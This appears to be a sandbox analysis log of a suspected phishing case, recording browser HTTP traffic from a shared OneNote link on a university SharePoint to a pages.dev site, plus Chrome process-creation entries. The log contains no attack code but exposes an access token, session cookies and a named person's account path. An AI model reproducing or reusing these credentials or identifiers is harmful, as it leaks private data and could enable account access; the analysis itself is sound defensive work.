    Source: global trafficHTTP traffic detected: GET /o/App_Scripts/Acl/Acl1033.js HTTP/1.1Host: euc-onenote.officeapps.live.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://euc-onenote.officeapps.live.com/o/onenoteframe.aspx?ui=fr%2DFR&rs=fr%2DFR&wopisrc=https%3A%2F%2Finsacentre-my.sharepoint.com%2Fpersonal%2Fchristel_chevereau_insa-cvl_fr%2F_vti_bin%2Fwopi.ashx%2Ffolders%2F5c627324b4e64967a31a5c2e2767a2a0&wdenableroaming=1&mscc=0&wdodb=1&hid=E7036BA0-4004-5000-4704-8C7977F963C9&wdorigin=Sharing&wdhostclicktime=1664836694371&jsapi=1&jsapiver=v1&newsession=1&corrid=f4fb35ab-872b-4831-80cd-60f1741f9c31&usid=f4fb35ab-872b-4831-80cd-60f1741f9c31&sftc=1&cac=1&mtf=1&sfp=1&readonly=1&wdredirectionreason=Force_SingleStepBoot&rct=Medium&ctp=LeastProtectedAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: BIGipCookie=000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000; PrivNote=-1
    Source: global trafficHTTP traffic detected: GET /o/OneNoteS2SHandler.ashx?action=eduproperties&notebookid=1-5C627324-B4E6-4967-A31A-5C2E2767A2A0&isteacher=false&isstudent=false&WOPIsrc=https%3A%2F%2Finsacentre%2Dmy%2Esharepoint%2Ecom%2Fpersonal%2Fchristel%5Fchevereau%5Finsa%2Dcvl%5Ffr%2F%5Fvti%5Fbin%2Fwopi%2Eashx%2Ffolders%2F5c627324b4e64967a31a5c2e2767a2a0&access_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6ImFrUFRFTzRYU0N4c3hXOTBHMl9Zd1lWRGdIYyJ9%2EeyJhdWQiOiJ3b3BpL2luc2FjZW50cmUtbXkuc2hhcmVwb2ludC5jb21AZjc0MjE0NTAtZGYxNi00NzE0LWFkYTEtMzk1MzkwY2I5MWQzIiwiaXNzIjoiMDAwMDAwMDMtMDAwMC0wZmYxLWNlMDAtMDAwMDAwMDAwMDAwQDkwMTQwMTIyLTg1MTYtMTFlMS04ZWZmLTQ5MzA0OTI0MDE5YiIsIm5iZiI6IjE2NjQ4MDQyOTYiLCJleHAiOiIxNjY0ODQwMjk2IiwibmFtZWlkIjoiMCMuZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YyIsIm5paSI6Im1pY3Jvc29mdC5zaGFyZXBvaW50IiwiaXN1c2VyIjoidHJ1ZSIsImNhY2hla2V5IjoiMGguZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YyIsInNoYXJpbmdpZCI6IlkzbSt5S21nQWt1SEsrbFFjWjJSL3ciLCJpc2xvb3BiYWNrIjoiVHJ1ZSIsImFwcGN0eCI6IjVjNjI3MzI0YjRlNjQ5NjdhMzFhNWMyZTI3NjdhMmEwO01NSW9kVHVrMnhacDRTTFIyUlQ3cU9HcTNsTT07RGVmYXVsdDsxMmNlNzM1ZTFmNGM0YjkyOTQzNGQ5Nzk4YzJmY2JiOTs7VHJ1ZTs7OzA7ZTcwMzZiYTAtNDAwNC01MDAwLTQ3MDQtOGM3OTc3Zjk2M2M5In0%2EEWb66LDcPK9or86SYiXEnS8X85go%5FGF6jrytmNe%2DVM0DP1xedkdH8%2DP7maQkiGV1uoKn2Q3P4K07W8GXPgYZ5y8fXzywqlJykkoJzCJPRAx6O%5FcBiZszwxDu1rJtgjSTldsdPBQi%2Dx4isn%5FtXs1kVY3k0U38ib%2DUTDhESo5GkrQ59aM3v5L0NqOv7JFyPd5UFya1amQrzflYMZLjlIR7Cpl8sbK80iNccduMe%5FYJ8j12fHoZippN9rN6taMKDu9wT0A9JTtAxplzwDJbTKBuRr6bA7EzroK8GpTlnMKJldwuHWyPyVYQHIAwW8osIl11pJ4nzIiwd96ynH3CffKLmQ&access_token_ttl=1664840296804 HTTP/1.1Host: euc-onenote.officeapps.live.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"X-WacFrontEnd: AM1PEPF000094C7X-OfficeVersion: 16.0.15707.41015X-Key: 5CkbCfV/c5WRPlfo2bTVsG0FKIqu826w6sof/5159dg=,638004010975601703X-WacUserAgent: MSWACONSyncX-Requested-With: XMLHttpRequestX-xhr: 1sec-ch-ua-platform: "Windows"haep: 1OrgIdSiteUrl: https%3A%2F%2Finsacentre%2Dmy%2Esharepoint%2Ecom%2Fpersonal%2Fchristel%5Fchevereau%5Finsa%2Dcvl%5FfrX-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36X-UserType: WOPIX-IsCoauthSession: trueX-WacCluster: GEU2Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://euc-onenote.officeapps.live.com/o/onenoteframe.aspx?ui=fr%2DFR&rs=fr%2DFR&wopisrc=https%3A%2F%2Finsacentre-my.sharepoint.com%2Fpersonal%2Fchristel_chevereau_insa-cvl_fr%2F_vti_bin%2Fwopi.ashx%2Ffolders%2F5c627324b4e64967a31a5c2e2767a2a0&wdenableroaming=1&mscc=0&wdodb=1&hid=E7036BA0-4004-5000-4704-8C7977F963C9&wdorigin=Sharing&wdhostclicktime=1664836694371&jsapi=1&jsapiver=v1&newsession=1&
    Source: global trafficHTTP traffic detected: GET /o/OneNoteS2SHandler.ashx?action=eduproperties&notebookid=1-5C627324-B4E6-4967-A31A-5C2E2767A2A0&isteacher=false&isstudent=false&WOPIsrc=https%3A%2F%2Finsacentre%2Dmy%2Esharepoint%2Ecom%2Fpersonal%2Fchristel%5Fchevereau%5Finsa%2Dcvl%5Ffr%2F%5Fvti%5Fbin%2Fwopi%2Eashx%2Ffolders%2F5c627324b4e64967a31a5c2e2767a2a0&access_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6ImFrUFRFTzRYU0N4c3hXOTBHMl9Zd1lWRGdIYyJ9%2EeyJhdWQiOiJ3b3BpL2luc2FjZW50cmUtbXkuc2hhcmVwb2ludC5jb21AZjc0MjE0NTAtZGYxNi00NzE0LWFkYTEtMzk1MzkwY2I5MWQzIiwiaXNzIjoiMDAwMDAwMDMtMDAwMC0wZmYxLWNlMDAtMDAwMDAwMDAwMDAwQDkwMTQwMTIyLTg1MTYtMTFlMS04ZWZmLTQ5MzA0OTI0MDE5YiIsIm5iZiI6IjE2NjQ4MDQyOTYiLCJleHAiOiIxNjY0ODQwMjk2IiwibmFtZWlkIjoiMCMuZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YyIsIm5paSI6Im1pY3Jvc29mdC5zaGFyZXBvaW50IiwiaXN1c2VyIjoidHJ1ZSIsImNhY2hla2V5IjoiMGguZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YyIsInNoYXJpbmdpZCI6IlkzbSt5S21nQWt1SEsrbFFjWjJSL3ciLCJpc2xvb3BiYWNrIjoiVHJ1ZSIsImFwcGN0eCI6IjVjNjI3MzI0YjRlNjQ5NjdhMzFhNWMyZTI3NjdhMmEwO01NSW9kVHVrMnhacDRTTFIyUlQ3cU9HcTNsTT07RGVmYXVsdDsxMmNlNzM1ZTFmNGM0YjkyOTQzNGQ5Nzk4YzJmY2JiOTs7VHJ1ZTs7OzA7ZTcwMzZiYTAtNDAwNC01MDAwLTQ3MDQtOGM3OTc3Zjk2M2M5In0%2EEWb66LDcPK9or86SYiXEnS8X85go%5FGF6jrytmNe%2DVM0DP1xedkdH8%2DP7maQkiGV1uoKn2Q3P4K07W8GXPgYZ5y8fXzywqlJykkoJzCJPRAx6O%5FcBiZszwxDu1rJtgjSTldsdPBQi%2Dx4isn%5FtXs1kVY3k0U38ib%2DUTDhESo5GkrQ59aM3v5L0NqOv7JFyPd5UFya1amQrzflYMZLjlIR7Cpl8sbK80iNccduMe%5FYJ8j12fHoZippN9rN6taMKDu9wT0A9JTtAxplzwDJbTKBuRr6bA7EzroK8GpTlnMKJldwuHWyPyVYQHIAwW8osIl11pJ4nzIiwd96ynH3CffKLmQ&access_token_ttl=1664840296804 HTTP/1.1Host: euc-onenote.officeapps.live.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"X-WacFrontEnd: AM1PEPF000094C7X-OfficeVersion: 16.0.15707.41015X-Key: 5CkbCfV/c5WRPlfo2bTVsG0FKIqu826w6sof/5159dg=,638004010975601703X-WacUserAgent: MSWACONSyncX-Requested-With: XMLHttpRequestX-xhr: 1sec-ch-ua-platform: "Windows"haep: 1OrgIdSiteUrl: https%3A%2F%2Finsacentre%2Dmy%2Esharepoint%2Ecom%2Fpersonal%2Fchristel%5Fchevereau%5Finsa%2Dcvl%5FfrX-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36X-UserType: WOPIX-IsCoauthSession: trueX-WacCluster: GEU2Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://euc-onenote.officeapps.live.com/o/onenoteframe.aspx?ui=fr%2DFR&rs=fr%2DFR&wopisrc=https%3A%2F%2Finsacentre-my.sharepoint.com%2Fpersonal%2Fchristel_chevereau_insa-cvl_fr%2F_vti_bin%2Fwopi.ashx%2Ffolders%2F5c627324b4e64967a31a5c2e2767a2a0&wdenableroaming=1&mscc=0&wdodb=1&hid=E7036BA0-4004-5000-4704-8C7977F963C9&wdorigin=Sharing&wdhostclicktime=1664836694371&jsapi=1&jsapiver=v1&newsession=1&
    Source: global trafficHTTP traffic detected: GET /me?partner=OneNoteOnline&version=10.22108.2&market=FR-FR&wrapperId=suiteshell HTTP/1.1Host: amcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Origin: https://euc-onenote.officeapps.live.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://euc-onenote.officeapps.live.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /o/OneNoteS2SHandler.ashx?action=eduproperties&notebookid=1-5C627324-B4E6-4967-A31A-5C2E2767A2A0&isteacher=false&isstudent=false&WOPIsrc=https%3A%2F%2Finsacentre%2Dmy%2Esharepoint%2Ecom%2Fpersonal%2Fchristel%5Fchevereau%5Finsa%2Dcvl%5Ffr%2F%5Fvti%5Fbin%2Fwopi%2Eashx%2Ffolders%2F5c627324b4e64967a31a5c2e2767a2a0&access_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6ImFrUFRFTzRYU0N4c3hXOTBHMl9Zd1lWRGdIYyJ9%2EeyJhdWQiOiJ3b3BpL2luc2FjZW50cmUtbXkuc2hhcmVwb2ludC5jb21AZjc0MjE0NTAtZGYxNi00NzE0LWFkYTEtMzk1MzkwY2I5MWQzIiwiaXNzIjoiMDAwMDAwMDMtMDAwMC0wZmYxLWNlMDAtMDAwMDAwMDAwMDAwQDkwMTQwMTIyLTg1MTYtMTFlMS04ZWZmLTQ5MzA0OTI0MDE5YiIsIm5iZiI6IjE2NjQ4MDQyOTYiLCJleHAiOiIxNjY0ODQwMjk2IiwibmFtZWlkIjoiMCMuZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YyIsIm5paSI6Im1pY3Jvc29mdC5zaGFyZXBvaW50IiwiaXN1c2VyIjoidHJ1ZSIsImNhY2hla2V5IjoiMGguZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YyIsInNoYXJpbmdpZCI6IlkzbSt5S21nQWt1SEsrbFFjWjJSL3ciLCJpc2xvb3BiYWNrIjoiVHJ1ZSIsImFwcGN0eCI6IjVjNjI3MzI0YjRlNjQ5NjdhMzFhNWMyZTI3NjdhMmEwO01NSW9kVHVrMnhacDRTTFIyUlQ3cU9HcTNsTT07RGVmYXVsdDsxMmNlNzM1ZTFmNGM0YjkyOTQzNGQ5Nzk4YzJmY2JiOTs7VHJ1ZTs7OzA7ZTcwMzZiYTAtNDAwNC01MDAwLTQ3MDQtOGM3OTc3Zjk2M2M5In0%2EEWb66LDcPK9or86SYiXEnS8X85go%5FGF6jrytmNe%2DVM0DP1xedkdH8%2DP7maQkiGV1uoKn2Q3P4K07W8GXPgYZ5y8fXzywqlJykkoJzCJPRAx6O%5FcBiZszwxDu1rJtgjSTldsdPBQi%2Dx4isn%5FtXs1kVY3k0U38ib%2DUTDhESo5GkrQ59aM3v5L0NqOv7JFyPd5UFya1amQrzflYMZLjlIR7Cpl8sbK80iNccduMe%5FYJ8j12fHoZippN9rN6taMKDu9wT0A9JTtAxplzwDJbTKBuRr6bA7EzroK8GpTlnMKJldwuHWyPyVYQHIAwW8osIl11pJ4nzIiwd96ynH3CffKLmQ&access_token_ttl=1664840296804 HTTP/1.1Host: euc-onenote.officeapps.live.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"X-WacFrontEnd: AM1PEPF000094C7X-OfficeVersion: 16.0.15707.41015X-Key: 5CkbCfV/c5WRPlfo2bTVsG0FKIqu826w6sof/5159dg=,638004010975601703X-WacUserAgent: MSWACONSyncX-Requested-With: XMLHttpRequestX-xhr: 1sec-ch-ua-platform: "Windows"haep: 1OrgIdSiteUrl: https%3A%2F%2Finsacentre%2Dmy%2Esharepoint%2Ecom%2Fpersonal%2Fchristel%5Fchevereau%5Finsa%2Dcvl%5FfrX-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36X-UserType: WOPIX-IsCoauthSession: trueX-WacCluster: GEU2Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://euc-onenote.officeapps.live.com/o/onenoteframe.aspx?ui=fr%2DFR&rs=fr%2DFR&wopisrc=https%3A%2F%2Finsacentre-my.sharepoint.com%2Fpersonal%2Fchristel_chevereau_insa-cvl_fr%2F_vti_bin%2Fwopi.ashx%2Ffolders%2F5c627324b4e64967a31a5c2e2767a2a0&wdenableroaming=1&mscc=0&wdodb=1&hid=E7036BA0-4004-5000-4704-8C7977F963C9&wdorigin=Sharing&wdhostclicktime=1664836694371&jsapi=1&jsapiver=v1&newsession=1&
    Source: global trafficHTTP traffic detected: GET /o/AddinServiceHandler.ashx?action=laststoreupdate&app=4&lc=FR-FR&WOPIsrc=https%3A%2F%2Finsacentre%2Dmy%2Esharepoint%2Ecom%2Fpersonal%2Fchristel%5Fchevereau%5Finsa%2Dcvl%5Ffr%2F%5Fvti%5Fbin%2Fwopi%2Eashx%2Ffolders%2F5c627324b4e64967a31a5c2e2767a2a0&access_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6ImFrUFRFTzRYU0N4c3hXOTBHMl9Zd1lWRGdIYyJ9%2EeyJhdWQiOiJ3b3BpL2luc2FjZW50cmUtbXkuc2hhcmVwb2ludC5jb21AZjc0MjE0NTAtZGYxNi00NzE0LWFkYTEtMzk1MzkwY2I5MWQzIiwiaXNzIjoiMDAwMDAwMDMtMDAwMC0wZmYxLWNlMDAtMDAwMDAwMDAwMDAwQDkwMTQwMTIyLTg1MTYtMTFlMS04ZWZmLTQ5MzA0OTI0MDE5YiIsIm5iZiI6IjE2NjQ4MDQyOTYiLCJleHAiOiIxNjY0ODQwMjk2IiwibmFtZWlkIjoiMCMuZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YyIsIm5paSI6Im1pY3Jvc29mdC5zaGFyZXBvaW50IiwiaXN1c2VyIjoidHJ1ZSIsImNhY2hla2V5IjoiMGguZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YyIsInNoYXJpbmdpZCI6IlkzbSt5S21nQWt1SEsrbFFjWjJSL3ciLCJpc2xvb3BiYWNrIjoiVHJ1ZSIsImFwcGN0eCI6IjVjNjI3MzI0YjRlNjQ5NjdhMzFhNWMyZTI3NjdhMmEwO01NSW9kVHVrMnhacDRTTFIyUlQ3cU9HcTNsTT07RGVmYXVsdDsxMmNlNzM1ZTFmNGM0YjkyOTQzNGQ5Nzk4YzJmY2JiOTs7VHJ1ZTs7OzA7ZTcwMzZiYTAtNDAwNC01MDAwLTQ3MDQtOGM3OTc3Zjk2M2M5In0%2EEWb66LDcPK9or86SYiXEnS8X85go%5FGF6jrytmNe%2DVM0DP1xedkdH8%2DP7maQkiGV1uoKn2Q3P4K07W8GXPgYZ5y8fXzywqlJykkoJzCJPRAx6O%5FcBiZszwxDu1rJtgjSTldsdPBQi%2Dx4isn%5FtXs1kVY3k0U38ib%2DUTDhESo5GkrQ59aM3v5L0NqOv7JFyPd5UFya1amQrzflYMZLjlIR7Cpl8sbK80iNccduMe%5FYJ8j12fHoZippN9rN6taMKDu9wT0A9JTtAxplzwDJbTKBuRr6bA7EzroK8GpTlnMKJldwuHWyPyVYQHIAwW8osIl11pJ4nzIiwd96ynH3CffKLmQ&access_token_ttl=1664840296804 HTTP/1.1Host: euc-onenote.officeapps.live.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"haep: 1X-WacFrontEnd: AM1PEPF000094C7X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31sec-ch-ua-mobile: ?0X-OfficeVersion: 16.0.15707.41015X-Key: 5CkbCfV/c5WRPlfo2bTVsG0FKIqu826w6sof/5159dg=,638004010975601703X-WacUserAgent: MSWACONSyncUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36X-Requested-With: XMLHttpRequestX-UserType: WOPIX-xhr: 1X-IsCoauthSession: trueX-WacCluster: GEU2sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://euc-onenote.officeapps.live.com/o/onenoteframe.aspx?ui=fr%2DFR&rs=fr%2DFR&wopisrc=https%3A%2F%2Finsacentre-my.sharepoint.com%2Fpersonal%2Fchristel_chevereau_insa-cvl_fr%2F_vti_bin%2Fwopi.ashx%2Ffolders%2F5c627324b4e64967a31a5c2e2767a2a0&wdenableroaming=1&mscc=0&wdodb=1&hid=E7036BA0-4004-5000-4704-8C7977F963C9&wdorigin=Sharing&wdhostclicktime=1664836694371&jsapi=1&jsapiver=v1&newsession=1&corrid=f4fb35ab-872b-4831-80cd-60f1741f9c31&usid=f4fb35ab-872b-4831-80cd-60f1741f9c31&sftc=1&cac=1&mtf=1&sfp=1&readonly=1&wdredirectionreason=Force_SingleStepBoot&rct=Medium&ctp=L
    Source: global trafficHTTP traffic detected: GET /mydata/myprofile/expressionprofile/profilephoto:UserTileStatic,UserTileSmall/MeControlMediumUserTile?ck=1&ex=24&fofoff=1&sc=1664836715499 HTTP/1.1Host: storage.live.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://euc-onenote.officeapps.live.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /o/AppSettingsHandler.ashx?app=OneNote&usid=f4fb35ab-872b-4831-80cd-60f1741f9c31&build=16.0.15707.41015 HTTP/1.1Host: euc-onenote.officeapps.live.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://insacentre-my.sharepoint.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://insacentre-my.sharepoint.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: byzo.pages.devConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: byzo.pages.devConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://byzo.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: privateContent-Length: 1233Content-Type: text/htmlP3P: CP="CAO DSP COR ADMa DEV CONi TELi CUR PSA PSD TAI IVDi OUR SAMi BUS DEM NAV STA UNI COM INT PHY ONL FIN PUR"Set-Cookie: X-CorrelationId: 29e95b3b-2d2c-4583-9918-7c697492702cX-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31Strict-Transport-Security: max-age=31536000Timing-Allow-Origin: *X-OfficeFE: AM1PEPF000094C6X-OfficeVersion: 16.0.15707.41015X-OfficeCluster: GEU2X-OFFICEFD: AM1PEPF000094C6X-Cache: CONFIG_NOCACHEX-MSEdge-Flight: 2i49=afd_wacinfra4,2i4a=afd_wacinfra5X-MSEdge-Features: tasmigration015,typeheadertest,afd_waccluster,afd_wacinfra4,afd_wacinfra5X-MSEdge-Ref: Ref A: 22680BBB133A4FE0B994DF86C4D9566A Ref B: AMS231032603029 Ref C: 2022-10-03T13:38:35ZDate: Mon, 03 Oct 2022 13:38:35 GMTConnection: close
    Source: unknownHTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; AEC=AakniGO7HqlHWlnoY-P22_SwwnNSfVGxlF1NgK5nuj5WLe313NyJi16g7z4; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg; NID=511=nUT82hOv6CVwMNqDg-sTtCMJJ6SQ1v_cCpfCpf5nt8EolEbal01GWFyjG01tqWQgh9ciRU880J6nLd2gdbhAJs44PsHAZaVQAFIbrqe2FmFgjrAAK7W9Z8u5LDvwsuZRng98jP6E23SJ4fsPIs326YmnuCwa92dRRCcB6MNeI_o
    Source: classification engineClassification label: mal56.phis.win@31/0@17/13
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1968 --field-trial-handle=1788,i,15895415173541107671,4193211191602431059,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" "https://insacentre-my.sharepoint.com/:o:/g/personal/christel_chevereau_insa-cvl_fr/EiRzYlzmtGdJoxpcLidnoqABdW_125MBX4mxznGrm93yrA?e=ErmP6W
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1968 --field-trial-handle=1788,i,15895415173541107671,4193211191602431059,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
